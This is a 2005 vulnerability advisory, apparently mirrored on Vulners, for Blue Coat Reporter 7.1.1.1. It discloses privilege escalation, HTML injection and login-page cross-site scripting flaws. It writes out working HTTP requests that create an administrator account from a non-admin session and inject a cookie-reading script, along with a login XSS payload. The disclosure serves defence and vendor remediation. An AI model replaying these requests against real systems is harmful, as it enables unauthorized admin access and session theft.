Vulners
Lucene search
bluecoat7111.txt
`Blue Coat Reporter 7.1.1.1 - multiple remote vulnerabilities
============================================================
Blue Coat Reporter
==================
"Blue Coat Reporter 7 provides identity-based reporting on Web
communications enabling enterprises to evaluate Web policies and manage
network resources more effectively. "
Product/Version
===============
Blue Coat Reporter 7.1.1.1
Running on Win32
Vulnerabilities
===============
a) Privilege escalation
A user without administrative privileges is able to create a useraccount
with administrative privileges.
b) HTML-Code Injection
Unauthenticated users can inject html-code into the application. The
code will be executed, if an authenticated user is viewing the affected
website.
c) Cross Site Scripting at login page
Supplying scriptcode instead of a valid username at the login page will
end in a cross site scripting.
Exploiting
==========
a) Privlege escalation
1) Create a non-priv user (user: test, pass: test)
2) Log in with the non-administrative user account
3) Sent the following request to create a user hurz with password hurz and
admin privileges.
POST /?dp+templates.admin.users.user_form_processing HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://192.168.142.133:8987/?dp+templates.admin.users.user_form+volatile.form_type+new
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.142.133:8987
Pragma: no-cache
Cookie: session_id=d9430f0d59eb43871e2c38ab84627232; authusername7=test;
authpassword7=098f6bcd4621d373cade4e832627b4f6
Content-Length: 170
submit=Save+and+Close&volatile.user.username=hurz&volatile.user.password=hurz&volatile.user.administrator=true&volatile.user.profiles.0=profile1&volatile.form_type=new
b) HTML-Code Injection
POST
/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://192.168.142.133:8987/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.142.133:8987
Pragma: no-cache
Cookie: session_id=invalid; authusername7=invalid; authpassword7=invalid
Content-Length: 100
volatile.add_license=&volatile.license_to_add=<script>alert(document.cookie)</script>
c) Cross Site Scripting at login page
Supply the following username at the login page:
"/><script>alert("BlueGoat")</script>
Vendor
======
Blue Coat was responding to my message very fast and in a very professional
way. Exemplary!
Homepage: http://www.bluecoat.com
Advisory:
http://www.bluecoat.com/support/knowledge/advisory_reporter_711_vulnerabilities.html
Discovered
==========
19.05.2005 by Oliver Karow
http://www.oliverkarow.de/research/bluecoat.htm
--
Weitersagen: GMX DSL-Flatrates mit Tempo-Garantie!
Ab 4,99 Euro/Monat: http://www.gmx.net/de/go/dsl
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4